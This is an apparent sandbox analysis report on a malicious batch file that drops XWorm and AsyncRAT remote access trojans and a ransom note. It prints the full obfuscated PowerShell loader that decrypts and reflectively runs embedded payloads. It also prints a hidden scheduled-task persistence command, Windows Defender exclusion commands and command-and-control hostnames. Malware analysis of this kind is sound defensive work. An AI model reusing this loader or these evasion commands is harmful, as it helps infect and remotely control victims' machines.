Analysis
-
max time kernel
86s -
max time network
93s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
-
submitted
04-07-2024 20:01
General
-
Target
wininit.bat
-
Size
292KB
-
MD5
cf1da3f20349f15bfacf7c271d60684c
-
SHA1
ad4a58069d800ca900c5752929aa92d5d87fe3c7
-
SHA256
ee6dc82f435a2224bcc30034bb5c5827d4470078f5238bf2f6e5a5023528d24f
-
SHA512
8743be3187c9a080cc8fb6ec7243ff98f3d157c4e884503045bc56b0d042ef9a81a127c92a8f80d00b899f3e92c11f9877bd3bdf6c7eeb863d1bb503830cdccd
-
SSDEEP
6144:OFJjDy7sYeIK8ODi9szVwhTvSPOk07BuYfZ2YIOXi/COBNFfIsqJW:OFZSsV88ERrSP+7EQ20QFwJW
Malware Config
Extracted
xworm
super-nearest.gl.at.ply.gg:17835
best-bird.gl.at.ply.gg:27196
wiz.bounceme.net:6000
-
install_file
USB.exe
Extracted
asyncrat
Default
finally-grande.gl.at.ply.gg:25844
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Detect Xworm Payload 5 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Async RAT payload 2 IoCs
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 22 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 25 IoCs
-
Suspicious use of SendNotifyMessage 24 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\wininit.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7JNVAI/bOCfTrc9Cyv1KrVXb/edm5Def39ZXQyWYIiY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cjJ5rTvtiS42ynBUE3pozA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Ludab=New-Object System.IO.MemoryStream(,$param_var); $svcPY=New-Object System.IO.MemoryStream; $oCbKk=New-Object System.IO.Compression.GZipStream($Ludab, [IO.Compression.CompressionMode]::Decompress); $oCbKk.CopyTo($svcPY); $oCbKk.Dispose(); $Ludab.Dispose(); $svcPY.Dispose(); $svcPY.ToArray();}function execute_function($param_var,$param2_var){ $WLpRi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $urgeW=$WLpRi.EntryPoint; $urgeW.Invoke($null, $param2_var);}$JiVki = 'C:\Users\Admin\AppData\Local\Temp\wininit.bat';$host.UI.RawUI.WindowTitle = $JiVki;$BrRJc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($JiVki).Split([Environment]::NewLine);foreach ($Ioscd in $BrRJc) { if ($Ioscd.StartsWith('gAlOrZETIRGuyGxGQovI')) { $LUETq=$Ioscd.Substring(20); break; }}$payloads_var=[string[]]$LUETq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_79_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_79.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_79.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_79.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7JNVAI/bOCfTrc9Cyv1KrVXb/edm5Def39ZXQyWYIiY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cjJ5rTvtiS42ynBUE3pozA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Ludab=New-Object System.IO.MemoryStream(,$param_var); $svcPY=New-Object System.IO.MemoryStream; $oCbKk=New-Object System.IO.Compression.GZipStream($Ludab, [IO.Compression.CompressionMode]::Decompress); $oCbKk.CopyTo($svcPY); $oCbKk.Dispose(); $Ludab.Dispose(); $svcPY.Dispose(); $svcPY.ToArray();}function execute_function($param_var,$param2_var){ $WLpRi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $urgeW=$WLpRi.EntryPoint; $urgeW.Invoke($null, $param2_var);}$JiVki = 'C:\Users\Admin\AppData\Roaming\Windows_Log_79.bat';$host.UI.RawUI.WindowTitle = $JiVki;$BrRJc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($JiVki).Split([Environment]::NewLine);foreach ($Ioscd in $BrRJc) { if ($Ioscd.StartsWith('gAlOrZETIRGuyGxGQovI')) { $LUETq=$Ioscd.Substring(20); break; }}$payloads_var=[string[]]$LUETq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Sets desktop wallpaper using registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\scvhost.exe"C:\Users\Admin\AppData\Local\Temp\scvhost.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\mshta.exe"C:\Users\Admin\AppData\Local\Temp\mshta.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\mshta.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mshta.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html6⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcac3146f8,0x7ffcac314708,0x7ffcac3147187⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:27⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2452 /prefetch:37⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2752 /prefetch:87⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5064 /prefetch:87⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5064 /prefetch:87⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:17⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD509c7ae658385f6de986103443217840b
SHA1298d880503edce4413337c09d3525f27a2edcd28
SHA25691e04ec38abdb0204458543592c4621b7bc0306407884f764aa9596a52454cd7
SHA5124e1272b209487d1e9e7d8502be49ebce91c76718410e817b3ac7faf47d9b699210aab1b941fbb5ddafc192ddf4b2ba151afd47fab753ec62bc0bca36039c55c3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD53c78617ec8f88da19254f9ff03312175
SHA1344e9fed9434d924d1c9f05351259cbc21e434d3
SHA2563cb47fcdca33bb3c8f4acc98424140987235ad79815da4f0e7593e4591ae90ed
SHA5125b58675088b0fc2b2d705cb648ea89385b80c7cf908b0f4f95a9acdbd350b50754e1b586202db6a918eef70029fafb210947f3c43c570ecf7657e08939fd7e9c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD541a7f109bd69c83731c6bc9a8183b6ef
SHA18df7b03f98718d791fae0fd41ce0b38f09886afd
SHA2565afe320f7c930d44c01e519cd611b39b8af99dd2459d7e985c99d7a4ae5fc2d8
SHA5127b7d187170c21b759aead85510f1fa36cdac95587ef1640bfab3588459706e11a09e711f86650f2d4ae6e4d0c84affdb906924ddd470a0875161fa2c16048404
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5839ce5ae0ef78a63eed3baca576fd8c4
SHA1cb2ab6a63cfb45caa559476bbaf585fcd54d2dc0
SHA256985d54a9ec3d0207a5438ae79bd0e245b113019c0e74572d174d5c2a03a6ab47
SHA5125b71d394878d19652525d5f465528c9f263feafa4714f7f2f72edbae6e17211bb046373fbe87726bcdcd1bd50d28994de6b30d3ab797f5b4af815dbc19619290
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD5b260491e0ba425d42eae0a6f7e5be166
SHA11c2821e3ccbb3445ef89a2213f38bdd0d49e49ae
SHA256b8244b449976461ddb6ee680590c89051418b638602b1203d064404fa9aefbc9
SHA51270e7c67eeae156db4d11660f6c3372713cf2bb83e188b5464311d429625273d449fe155f061c1538824131b500e1d65fa6acf6e56b765ea862bc73af0fb1e451
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD58c76712e8d3413a409d53d4fce9a2ef4
SHA1e4600f2e1a7e163214bb5b99928573afb64ce3f5
SHA25698b8516d6f5fd26c3f0e15bd41515a3e7cf8988c79d6b8a3b68c61e06473a5fd
SHA5120dac8e86394533a10352b7d6d81cd4485f6346cc84b74044ac7ef7862b283d1108ac69410e2d1ca5d8eddbc6d89b153de28a7f53cb101a6bd70d351efad99a9b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
2KB
MD5005bc2ef5a9d890fb2297be6a36f01c2
SHA10c52adee1316c54b0bfdc510c0963196e7ebb430
SHA256342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
SHA512f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5e5663972c1caaba7088048911c758bf3
SHA13462dea0f9c2c16a9c3afdaef8bbb1f753c1c198
SHA2569f7f29a4696876cadca3f14d7e43f9ede0c97fd64be3f5d94bda49a91b6a419e
SHA512ff4e72c46cf083de62baa2ce2661555dd91b5f144294015f7b262fd4500cb67fe80e1871a82da63b607e3e9cef401f4b73c587bf1134637881ecad51aad1eddc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD50aa63dbb46d451e47a7a682c64af776d
SHA13b0026f2dae8e9c491ccaa40133755779de35aaa
SHA2569158038718d41172c22a3c1a15852405e3e1c8e2c44fa066328eb1520e5d977b
SHA5124d2564850c2ab1bc71089412f19147df4a1cd3075aa2039aa894271b333cd9c510b7ba4d70889f24d45d8b366d8b5167abdcf24314e4753420337c7d34e7c43f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5ade8b780188478d4bf68c97bc995b06f
SHA10b5124fca500da8f833a3be98bd5f732d3962343
SHA256318ce58720b7608811b1177c41ce0f7ec0437783db8ed188acbc523d08a3646b
SHA512c9d19f196b25e62bb6f717c46ec892b18d243646afdae4b848ce30802d1df4e5576bf6328ac88ce8bca01f17fed79da778ecfeb770fe0bcc14d167ad577fcc13
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hcbjw42h.hkb.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\mshta.exeFilesize
70KB
MD5c5431c4b11742bc4ab73e896dd47153b
SHA116e6869c71d4ee978dfcc29b48f277f55828a331
SHA256bc404ae20b7085100cd7a7efddb28ce54014309bdbd60a5d57c135d44b950c4a
SHA512888a843e81400b900fb5a36ff171b03149d2719406e778614809cfaaa7e81e2e9deb6807d01ff1cec7ed1db30b585121fc8606d2bc52ffc5fc4d86e9d2b12f37
-
C:\Users\Admin\AppData\Local\Temp\scvhost.exeFilesize
63KB
MD51ca366d46cb1726508257459a9cbbf3f
SHA1183e7cd4165bd195cb05c7e474037f2a22707c67
SHA25676bb01ad0452e2f834661d54744645a14d057be883ad51d2b447f8d6c48d5129
SHA512aec28910c3f2015ea252d9e2c1a497eec8fd3ef0bc4ff0bf42a593f159a3539df8ec7b01487def04099ca68040ec3d484492319b7bfbafedcbd7bcc2627e67be
-
C:\Users\Admin\AppData\Roaming\Windows_Log_79.batFilesize
292KB
MD5cf1da3f20349f15bfacf7c271d60684c
SHA1ad4a58069d800ca900c5752929aa92d5d87fe3c7
SHA256ee6dc82f435a2224bcc30034bb5c5827d4470078f5238bf2f6e5a5023528d24f
SHA5128743be3187c9a080cc8fb6ec7243ff98f3d157c4e884503045bc56b0d042ef9a81a127c92a8f80d00b899f3e92c11f9877bd3bdf6c7eeb863d1bb503830cdccd
-
C:\Users\Admin\AppData\Roaming\Windows_Log_79.vbsFilesize
114B
MD5f615b865b89d6fca3489d69259aafb5b
SHA11cfa88e74aab33ae68a459efcd6ea555a06879f3
SHA2569848f4bb516ef9e3ccb06f85f77b42f6b8ed37244e227a7cc36d26819cd4e1de
SHA512ef9015602f5602f93370689b58fc8457f0ab1daf38ab8cd3bff49eabe9c84acfd62be9108448d45bddbac3fb2839cf12fc876984c20a678494ef3677cf736d37
-
C:\Users\Admin\Desktop\How To Decrypt My Files.htmlFilesize
639B
MD5d2dbbc3383add4cbd9ba8e1e35872552
SHA1020abbc821b2fe22c4b2a89d413d382e48770b6f
SHA2565ca82cbc4d582a4a425ae328ad12fd198095e2854f4f87b27a4b09e91173a3be
SHA512bb5e1bbf28c10c077644136b98d8d02bfec3b3e49c0829b4d4570b30e0aea0276eb748f749a491587a5e70141a7653be1d03c463a22e44efecde2e5a6c6e5e66
-
C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms.ENCFilesize
16B
MD50dd236afd1221fd580963ddb2386e0e0
SHA1094231d6cce22b826ff2268e77821c1999f34a1a
SHA256660aa028e60bc170b254a6aac6c0ff56f599224d447b20558ed367d3dbf45d05
SHA512f62681a3be7995e34b00d048d3e17f53dc10a07eb15907f3ebc3d68162f690577b970c9fbedff1430e51d6a20f4ffa9fc276744257d3b563434204529b9020f5
-
\??\pipe\LOCAL\crashpad_924_OQOSYKDLIPCMOHRGMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/1128-122-0x00000170606B0000-0x00000170606BC000-memory.dmpFilesize
48KB
-
memory/1128-53-0x00000170606C0000-0x00000170606DA000-memory.dmpFilesize
104KB
-
memory/3356-74-0x0000000000F50000-0x0000000000F66000-memory.dmpFilesize
88KB
-
memory/3828-15-0x000001FA57C80000-0x000001FA57C88000-memory.dmpFilesize
32KB
-
memory/3828-48-0x00007FFCB4230000-0x00007FFCB4CF1000-memory.dmpFilesize
10.8MB
-
memory/3828-6-0x000001FA57C20000-0x000001FA57C42000-memory.dmpFilesize
136KB
-
memory/3828-11-0x00007FFCB4230000-0x00007FFCB4CF1000-memory.dmpFilesize
10.8MB
-
memory/3828-0-0x00007FFCB4233000-0x00007FFCB4235000-memory.dmpFilesize
8KB
-
memory/3828-12-0x00007FFCB4230000-0x00007FFCB4CF1000-memory.dmpFilesize
10.8MB
-
memory/3828-13-0x000001FA57CA0000-0x000001FA57CE4000-memory.dmpFilesize
272KB
-
memory/3828-14-0x000001FA580E0000-0x000001FA58156000-memory.dmpFilesize
472KB
-
memory/3828-16-0x000001FA58060000-0x000001FA580A8000-memory.dmpFilesize
288KB
-
memory/3868-31-0x00007FFCB4230000-0x00007FFCB4CF1000-memory.dmpFilesize
10.8MB
-
memory/3868-18-0x00007FFCB4230000-0x00007FFCB4CF1000-memory.dmpFilesize
10.8MB
-
memory/3868-19-0x00007FFCB4230000-0x00007FFCB4CF1000-memory.dmpFilesize
10.8MB
-
memory/3868-29-0x00007FFCB4230000-0x00007FFCB4CF1000-memory.dmpFilesize
10.8MB
-
memory/4572-120-0x000000001CAB0000-0x000000001CABE000-memory.dmpFilesize
56KB
-
memory/4572-75-0x0000000000C60000-0x0000000000C78000-memory.dmpFilesize
96KB